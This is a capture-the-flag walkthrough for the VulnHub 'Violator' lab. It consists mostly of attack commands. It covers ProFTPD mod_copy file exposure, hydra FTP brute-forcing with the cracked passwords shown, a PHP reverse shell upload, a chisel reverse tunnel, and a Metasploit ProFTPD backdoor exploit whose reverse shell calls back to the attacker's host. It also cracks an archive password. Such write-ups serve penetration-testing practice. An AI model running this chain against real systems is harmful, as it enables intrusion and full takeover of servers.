信息收集

$ nmap -p- 192.168.101.148 --min-rate 1000 -sC -sV

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5rc3
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: I Say... I say... I say Boy! You pumpin' for oil or somethin'...?
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Unix

ProFTPD 本地权限

ftp> site cpfr /proc/self/root

ftp> site cpto /var/www/html/root

http://192.168.101.148/root/

http://192.168.101.148/root/etc/passwd

$ cewl -v 'https://en.wikipedia.org/wiki/Violator_(album)' -d 1 -w violator.txt
$ sed 's/ //g' violator.txt > violator_nospaces
$ cut -d'"' -f2 violator_nospaces | tr '[:upper:]' '[:lower:]' > password.txt

$ hydra -L username.txt -P password.txt ftp://192.168.101.148

username:af
password:enjoythesilence

username:dg
password:policyoftruth

$ cp /usr/share/webshells/php/php-reverse-shell.php /var/www/html

(dg)$ ftp 192.168.101.148

(dg)ftp> put /var/www/html/php-reverse-shell.php

http://192.168.101.148/php-reverse-shell.php

ProFTPD backdoor 权限提升

www-data@violator:/$ python -c 'import pty;pty.spawn("/bin/bash")'

www-data@violator:/$ su dg

dg@violator:/$ sudo -l

dg@violator:/$ cat /home/aw/hint

dg@violator:/$ sudo /home/dg/bd/sbin/proftpd

dg@violator:/$ netstat -lnput

telnet 127.0.0.1 2121

echo dg ALL=\(ALL:ALL\) ALL > /tmp/dg

$ chisel server -p 8000 --reverse

dg@violator:/$ ./chisel client 192.168.101.128:8000 R:2121:127.0.0.1:2121&

$ msfconsole
use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl
msf exploit(proftpd_133c_backdoor) > set lhost 192.168.101.128
msf exploit(proftpd_133c_backdoor) > set rhost 127.0.0.1
msf exploit(proftpd_133c_backdoor) > set rport 2121
msf exploit(proftpd_133c_backdoor) > exploit

cat /root/flag.txt

root@violator:/root# python3 -m http.server 9999

$ rar2john crocs.rar > hash

$ john hash --wordlist=../Desktop/password.txt

password:World in My Eyes

$ unrar x crocs.rar

使用image to ascii 工具来查看图片信息

https://github.com/MartinxMax/ImageToAscii

$ exiftool artwork.jpg

https://www.dcode.fr/enigma-machine-cipher

ONE FINAL CHALLENGE FOR YOU BGHX CONGRATULATIONS FOR THE FOURTH TIME ON SNARFING THE FLAG ON VIOLATOR ILL PRESUME BY NOW YOULL KNOW WHAT I WAS LISTENING TO WHEN CREATING THIS CTF I HAVE INCLUDED THINGS WHICH WERE DELIBERATLY AVOIDING THE OBVIOUS ROUTE INTO KEEP YOU ON YOUR TOES ANOTHER THOUGHT TO PONDER IS THAT BY ABUSING PERMISSIONS YOU ARE ALSO BY DEFINITION A VIOLATOR SHOUTOUTS AGAIN TO VULNHUB FOR HOSTING A GREAT LEARNING TOOL A SPECIAL THANKS GOES TO BENR AND GKNSB FOR TESTING AND TO GTMLK FOR THE OFFER TO HOST THE CTF AGAIN KNIGHTMARE